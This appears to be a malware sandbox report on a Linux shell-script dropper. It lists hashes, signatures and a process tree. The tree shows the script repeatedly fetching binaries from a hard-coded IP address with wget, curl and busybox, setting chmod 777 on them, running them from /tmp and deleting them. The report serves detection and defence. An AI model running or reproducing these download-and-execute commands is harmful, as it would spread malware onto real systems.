Analysis
-
max time kernel
39s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1510 chmod 1576 chmod 1620 chmod 1644 chmod 1656 chmod 1558 chmod 1638 chmod 1546 chmod 1497 chmod 1528 chmod 1602 chmod 1608 chmod 1614 chmod 1534 chmod 1594 chmod 1504 chmod 1552 chmod 1626 chmod 1650 chmod 1582 chmod 1632 chmod 1491 chmod 1516 chmod 1522 chmod 1564 chmod 1570 chmod 1540 chmod 1588 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 1492 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 1498 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 1505 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 1511 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 1517 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 1523 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 1529 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 1535 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 1541 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P 1547 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe 1553 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy 1559 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 1565 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 1571 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 1577 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 1583 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 1589 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 1595 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 1603 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 1609 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 1615 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 1621 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 1627 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 1633 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 1639 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P 1645 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe 1651 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy 1657 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P curl File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy curl File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl
Processes
-
/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh1⤵PID:1473
-
/bin/rm/bin/rm bins.sh2⤵PID:1474
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:1475
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Writes file to tmp directory
PID:1482
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:1490
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:1491
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:1492
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:1493
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:1494
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Writes file to tmp directory
PID:1495
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:1496
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:1497
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:1498
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:1499
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:1500
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:1503
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:1506
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:1509
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:1512
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:1515
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:1518
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:1521
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:1524
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:1527
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:1530
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:1533
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:1539
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:1545
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:1551
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:1557
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:1563
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:1569
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:1575
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:1581
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:1587
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:1590
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:1591
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:1593
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:1596
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:1601
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:1604
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:1605
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:1607
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:1610
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:1613
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:1616
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:1619
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:1622
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:1623
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:1625
-
-
